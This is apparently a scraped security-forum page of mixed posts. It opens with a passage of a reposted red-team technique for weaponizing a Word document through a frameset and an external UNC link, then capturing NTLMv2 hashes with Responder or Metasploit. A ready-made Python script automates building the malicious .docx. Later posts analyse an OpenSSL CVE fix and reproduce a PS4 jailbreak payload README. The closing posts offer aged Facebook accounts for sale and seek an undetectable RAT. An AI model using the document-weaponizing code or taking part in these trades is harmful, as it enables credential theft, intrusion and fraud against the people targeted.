            <w:name w:val="3"/>
            <w:sourceFileName r:id="rId1"/>
            <w:linkedToFile/>
        </w:frame>
    </w:frameset>
</w:frameset>

webSettings XML – Frameset

The new webSettings.xml file which contains the frameset needs to be added back to the archive so that the previous version is overwritten. A new file (webSettings.xml.rels) must then be created in order to contain the relationship ID (rId1), the UNC path, and the TargetMode, which specifies whether the target is external or internal:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\192.168.1.169\Microsoft_Office_Updates.docx" TargetMode="External"/>
</Relationships>

webSettings XML Relationship File – Contents

The _rels directory contains the associated relationships of the document in terms of fonts, styles, themes, settings etc. Planting the new file in that directory will finalize the relationship link which has been created previously via the frameset.

Now that the Word document has been weaponized to connect to a UNC path over the Internet, Responder can be configured in order to capture the NTLM hashes:

responder -I wlan0 -e 192.168.1.169 -b -A -v

Once the target user opens the Word document, it will try to connect to the UNC path, and Responder will retrieve the NTLMv2 hash of the user.

Alternatively, the Metasploit Framework can be used instead of Responder in order to capture the password hash:

auxiliary/server/capture/smb

NTLMv2 hashes will be captured in Metasploit upon opening the document.

Conclusion

This technique can allow the red team to grab domain password hashes from users, which can lead to internal network access if 2-factor authentication for VPN access is not enabled and there is a weak password policy.
Additionally, if the target user is an elevated account such as a local administrator or domain admin, then this method can be combined with SMB relay in order to obtain a Meterpreter session.

Source: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/
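The manual 7-Zip steps above are easy to script. Below is a hedged Python sketch that rebuilds a benign docx with the frameset injected into word/webSettings.xml and the new relationship file added. The input/output file names are assumptions, and it assumes the stock </w:webSettings> closing tag is present in the document:

import zipfile

FRAMESET = ('<w:frameset><w:framesetSplitbar><w:w w:val="60"/>'
            '<w:color w:val="auto"/><w:noBorder/></w:framesetSplitbar>'
            '<w:frameset><w:frame><w:name w:val="3"/>'
            '<w:sourceFileName r:id="rId1"/><w:linkedToFile/>'
            '</w:frame></w:frameset></w:frameset>')

RELS = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame"'
        ' Target="\\\\192.168.1.169\\Microsoft_Office_Updates.docx" TargetMode="External"/>'
        '</Relationships>')

def weaponize(src="benign.docx", dst="weaponized.docx"):
    # zipfile cannot replace entries in place, so copy every entry across,
    # patching webSettings.xml on the way and appending the new .rels file
    with zipfile.ZipFile(src) as zin, zipfile.ZipFile(dst, "w") as zout:
        for item in zin.infolist():
            data = zin.read(item.filename)
            if item.filename == "word/webSettings.xml":
                data = data.replace(b"</w:webSettings>",
                                    FRAMESET.encode() + b"</w:webSettings>")
            zout.writestr(item, data)
        zout.writestr("word/_rels/webSettings.xml.rels", RELS)

weaponize()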
    1 point
  14. Pentester Academy TV (published Mar 28, 2018)

Today's episode of The Tool Box features NetRipper. We break down everything you need to know! Including what it does, who it was developed by, and the best ways to use it! Check out NetRipper here: Github - https://github.com/NytroRST/NetRipper Send your tool to: media@pentesteracademy.com for consideration. Thanks for watching and don't forget to subscribe to our channel for the latest cybersecurity news! Visit Hacker Arsenal for the latest attack-defense gadgets! https://www.hackerarsenal.com/ FOLLOW US ON: ~Facebook: http://bit.ly/2uS4pK0 ~Twitter: http://bit.ly/2vd5QSE ~Instagram: http://bit.ly/2v0tnY8 ~LinkedIn: http://bit.ly/2ujkyeC ~Google +: http://bit.ly/2tNFXtc ~Web: http://bit.ly/29dtbcn
    1 point
  15. CVE-2018-0739: OpenSSL ASN.1 stack overflow

This was a vulnerability discovered by Google's OSS-Fuzz project and it was fixed by Matt Caswell of the OpenSSL development team. The vulnerability affects OpenSSL releases prior to 1.0.2o and 1.1.0h and, based on the OpenSSL team's assessment, it cannot be triggered via SSL/TLS; however, constructed ASN.1 types with support for recursive definitions, such as PKCS7, can be used to trigger it.

/*
 * Decode an item, taking care of IMPLICIT tagging, if any. If 'opt' set and
 * tag mismatch return -1 to handle OPTIONAL
 */
static int asn1_item_embed_d2i(ASN1_VALUE **pval, const unsigned char **in,
                               long len, const ASN1_ITEM *it, int tag,
                               int aclass, char opt, ASN1_TLC *ctx)
{
    const ASN1_TEMPLATE *tt, *errtt = NULL;
    const ASN1_EXTERN_FUNCS *ef;
    const ASN1_AUX *aux = it->funcs;
    ASN1_aux_cb *asn1_cb;
    const unsigned char *p = NULL, *q;
    unsigned char oclass;
    char seq_eoc, seq_nolen, cst, isopt;
    long tmplen;
    int i;
    int otag;
    int ret = 0;
    ASN1_VALUE **pchptr;

    if (!pval)
        return 0;
    if (aux && aux->asn1_cb)
        asn1_cb = aux->asn1_cb;
    else
        asn1_cb = 0;

    switch (it->itype) {
    ...
    return 0;
}

What you see above is a snippet of crypto/asn1/tasn_dec.c where the ASN.1 decoding function asn1_item_embed_d2i() is located. Neither this function nor any of its callers had any check for recursive definitions. This means that given a malicious PKCS7 file, this decoding routine will keep on trying to decode nested items until the process runs out of stack space. To fix this, a new error case was added in the crypto/asn1/asn1.h header file, named ASN1_R_NESTED_TOO_DEEP. If we have a look at crypto/asn1/asn1_err.c we can see that the new error code is equivalent to the "nested too deep" error message.

    {ERR_REASON(ASN1_R_NESTED_ASN1_STRING), "nested asn1 string"},
+   {ERR_REASON(ASN1_R_NESTED_TOO_DEEP), "nested too deep"},
    {ERR_REASON(ASN1_R_NON_HEX_CHARACTERS), "non hex characters"},

Similarly, a new constant (ASN1_MAX_CONSTRUCTED_NEST) definition was added which is used to define the maximum number of recursive invocations of the asn1_item_embed_d2i() function. You can see the new definition in crypto/asn1/tasn_dec.c.

#include <openssl/err.h>

/*
 * Constructed types with a recursive definition (such as can be found in PKCS7)
 * could eventually exceed the stack given malicious input with excessive
 * recursion. Therefore we limit the stack depth. This is the maximum number of
 * recursive invocations of asn1_item_embed_d2i().
 */
#define ASN1_MAX_CONSTRUCTED_NEST 30

static int asn1_check_eoc(const unsigned char **in, long len);

Lastly, the asn1_item_embed_d2i() function itself was modified to have a new integer argument "depth" which is used as a counter for each iteration. You can see how the check is performed before entering the switch clause here.

    asn1_cb = 0;

    if (++depth > ASN1_MAX_CONSTRUCTED_NEST) {
        ASN1err(ASN1_F_ASN1_ITEM_EMBED_D2I, ASN1_R_NESTED_TOO_DEEP);
        goto err;
    }

    switch (it->itype) {

    case ASN1_ITYPE_PRIMITIVE:

Similarly, all calling functions in OpenSSL have been updated to ensure that the new argument is used as intended. The official security advisory describes the above vulnerability like this.
Constructed ASN.1 types with a recursive definition could exceed the stack (CVE-2018-0739)
==========================================================================================

Severity: Moderate

Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion. This could result in a Denial Of Service attack. There are no such structures used within SSL/TLS that come from untrusted sources so this is considered safe.

OpenSSL 1.1.0 users should upgrade to 1.1.0h
OpenSSL 1.0.2 users should upgrade to 1.0.2o

This issue was reported to OpenSSL on 4th January 2018 by the OSS-fuzz project. The fix was developed by Matt Caswell of the OpenSSL development team.

Source: https://xorl.wordpress.com/2018/03/30/cve-2018-0739-openssl-asn-1-stack-overflow/
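To make the shape of the fix concrete, here is a small Python sketch of the same idea: a recursive decoder that rejects input once nesting passes a fixed depth, instead of letting attacker-controlled recursion consume the stack. The names mirror the patch, but this is an illustration, not OpenSSL code:

MAX_CONSTRUCTED_NEST = 30   # mirrors ASN1_MAX_CONSTRUCTED_NEST

class NestedTooDeep(Exception):
    pass    # stands in for the ASN1_R_NESTED_TOO_DEEP error reason

def decode_item(node, depth=0):
    depth += 1
    if depth > MAX_CONSTRUCTED_NEST:
        raise NestedTooDeep("nested too deep")
    if isinstance(node, list):              # "constructed" type: recurse
        return [decode_item(child, depth) for child in node]
    return node                             # primitive: decode directly

decode_item([1, [2, [3]]])                  # shallow input decodes fine

evil = 1
for _ in range(10000):                      # maliciously deep nesting
    evil = [evil]
try:
    decode_item(evil)
except NestedTooDeep:
    print("rejected: nested too deep")      # fails fast, no stack exhaustion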
    1 point
  16. Microsoft Security Response Center (MSRC) (published Feb 14, 2018)

Rob Turner, Qualcomm Technologies. Almost three decades since the Morris worm and we're still plagued by memory corruption vulnerabilities in C and C++ software. Exploit mitigations aim to make the exploitation of these vulnerabilities impossible or prohibitively expensive. However, modern exploits demonstrate that currently deployed countermeasures are insufficient. In ARMv8.3, ARM introduces a new hardware security feature, pointer authentication. With ARM and ARM partners, including Microsoft, we helped to design this feature. Designing a processor extension is challenging. Among other requirements, changes should be transparent to developers (except compiler developers), support both system and application code, interoperate with legacy software, and provide binary backward compatibility. This talk discusses the processor extension and explores the design trade-offs, such as the decision to prefer authentication over encryption and the consequences of small tags. Also, this talk provides a security analysis, and examines how these new instructions can robustly and efficiently implement countermeasures. Presentation Slide Deck: https://www.slideshare.net/MSbluehat/...
    1 point
  17. Jailbreak Kernel Patches

Features:
- Jailbreak
- Sandbox escape
- Debug settings
- Enable UART
- Disable system update messages
- Delete system updates
- Fake self support
- Fake pkg support
- RPC server
- RPC client in C#

I use the standard fake pkg keys, created by flatz.

General Notes

Only for 4.55 jailbroken PlayStation 4 consoles! The main jkpatch payload utilizes a port of CTurt's payload sdk. Change the Makefile to have LIBPS4 point to the ps4-payload-sdk directory on your machine. I could have it referenced from the home directory but meh...

# change this to point to your ps4-payload-sdk directory
LIBPS4 := /home/John/ps4-payload-sdk/libPS4

If you decide to edit the resolve code in the kernel payload, make sure you do not mess with...

void resolve(uint64_t kernbase);

...as it is called from crt0.s, and changing it will produce errors. See other branches for other kernel support. I will support the latest publicly exploited firmware on the main branch.

RPC Quickstart

See either Example.cs or look at the RPC documentation. You can read/write memory, call functions, read/write kernel memory, and even load elfs. Here is a cool example of an elf loaded into COD Ghosts (forge mod made by me!). You can download the source code to the forge mod here. Have fun!

Coming Soon
- General code clean up and refactoring

Thank you to flatz, idc, zecoxao, hitodama, osdev.org, and anyone else I forgot! Twitter: @cloverleafswag3 psxhax: g991 golden <3

Source: https://github.com/xemio/jkpatch
    1 point
  18. Plus there's this user, spider, who downvotes almost everything (maybe I post something that doesn't interest him, but dude, just skip it and mind your own business; one dislike from someone like him can lead to a lot. In any case, what's certain is that a single dislike doesn't define a person).
    1 point
  19. Lol... You can't expect anything, but I can confirm that I've made many deals on this forum and I've never scammed anyone! I'm an honest guy; it's not money that drives me, decency is what counts. Having -16 doesn't mean I've scammed anyone; it means there are guys like you who hand out negative reputation over anything!
    1 point
  20. I have 2 accounts for sale, 5,000 friends each, more than 8 months old.
    1 point
  21. Lol, for $0.50 I wouldn't write a 100-word article even in Romanian.
    1 point
  22. I don't want to advertise or mess with your business, but on Fiverr these sell for much, much less, and they're even verified with a phone number and all. I also sell Facebook accounts, 2-3-4 months old, with a phone number added, joined to more than 50 groups where the smallest group has 15-16 thousand members, and all the groups allow automatic posting without approval... and I sell them far cheaper than what you're asking here. And yes, they're 100% from Romania; if a Pakistani or an Indian slipped through, that's a different story.
    1 point
  23. @thatsmyname : 200848877.rar
    1 point
  24. PM me with more details.
    -1 points
  25. Hi, I need someone with a good RAT, one that's easy to use and undetectable. I'm willing to buy it or pay for an interesting job. If anyone has really mastered this stuff and likes a challenge, please write to me.
    -1 points